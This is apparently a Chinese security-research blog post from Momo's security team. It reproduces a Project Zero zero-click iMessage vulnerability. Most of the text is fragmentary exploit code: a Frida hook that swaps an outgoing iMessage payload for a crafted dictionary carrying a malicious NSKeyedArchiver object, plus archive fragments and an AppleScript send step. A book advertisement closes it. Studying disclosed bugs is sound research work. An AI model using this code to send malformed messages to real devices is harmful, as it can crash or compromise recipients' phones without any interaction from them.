本次分享来自陌陌安全团队的exchen,上次他为大家解答了 iOS 加载异常图片系统重启之迷 ,本次又将会从谷歌 Project Zero 团队成员发现的具有 “无交互” 特点的 iMessage 漏洞中带来怎样的分享呢?咱们接着往下看。
brew install python3
pip3 install frida
#receiver = "YOUR EMAIL"
receiver = "[email protected]"
//var d = ObjC.classes.NSData.dataWithContentsOfFile_("PATH/obj");
var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
python3 sendMessage.py
console.log(dict); //打印原始正常的消息体
//对正常的消息体进行修改,构造带有漏洞的消息体
var newDict = ObjC.classes.NSMutableDictionary.dictionaryWithCapacity_(dict.count());
var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
console.log(d); //打印obj文件
newDict.setObject_forKey_("com.apple.messages.MSMessageExtensionBalloonPlugin:0000000000:com.apple.mobileslideshow.PhotosMessagesApp", "bid");
newDict.setObject_forKey_(d, "bp"); //obj文件
// newDict.setObject_forKey_("com.apple.messages.URLBalloonProvider", "bid");
newDict.setObject_forKey_(8, "gv");
newDict.setObject_forKey_(0, "pv");
newDict.setObject_forKey_(1, "v");
newDict.setObject_forKey_("FAA29682-27A6-498D-8170-CC92F2077441", "gid");
newDict.setObject_forKey_(d, "bp");
newDict.setObject_forKey_("CB2F0B8D-84F6-480E-9079-27DA53E14EBD", "r");
newDict.setObject_forKey_(1, "v");
newDict.setObject_forKey_("\Ufffd\Ufffc", "t");
args[0] = newDict.handle;
<dict>
<key>$classes</key>
<array>
<string>NSDictionary</string>
<string>NSObject</string>
</array>
<key>$classname</key>
<string>NSKnownKeysDictionary1</string>
</dict>
<dict>
<key>$classes</key>
<array>
<string>NSKnownKeysMappingStrategy1</string>
<string>NSObject</string>
</array>
<key>$classname</key>
<string>NSKnownKeysMappingStrategy1</string>
</dict>
<string>i am very long indeed</string>
<dict>
NSDictionary* obj = @{@"testKey": @"testValue", @"testArray":@[@100, @200, @300], @"testDict":@{@"dictKey":@"dictValue"}};
NSData* data = [NSKeyedArchiver archivedDataWithRootObject:obj requiringSecureCoding:true error:&err];
if (!data) {
NSLog(@"Error: %@", err);
return;
}
[data writeToFile:@"/Users/exchen/Downloads/archive_test" atomically:YES];
subprocess.call(["osascript", "sendMessage.applescript", receiver, "REPLACEME"]
然后在 injectMessage.js 中也需要将 REPLACEME 保持和自定义的消息内容一致
if (t == "REPLACEME")
参考资料:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1884
https://bugs.chromium.org/p/project-zero/issues/detail?id=1874
https://bugs.chromium.org/p/project-zero/issues/detail?id=1873
https://bugs.chromium.org/p/project-zero/issues/detail?id=1858
Author: exchen
关于《九阴真经——IOS黑客攻防秘籍》 本书内容易于理解,可以让读者循序渐进、系统性地学习iOS安全技术。书中首先细致地介绍了越狱环境的开发与逆向相关工具,然后依次讲解了汇编基础、动态调试、静态分析、注入与hook、文件格式,最后为大家呈现了应用破解与应用保护、隐私获取与取证、刷量与作弊、唯一设备ID、写壳内幕等多个主题。 书籍详细链接👇 https://www.exchen.net/ios-hacker-secret-book-contents.html
-end-
陌陌安全也会在接下来的日子中
给大家带来更多更好的技术分享
咱们下期再见👋
陌陌安全致力于以务实的工作保障陌陌旗下所有产品及亿万用户的信息安全,以开放的心态拥抱信息安全机构、团队与个人之间的共赢协作,以自由的氛围和丰富的资源支撑优秀同学的个人发展与职业成长。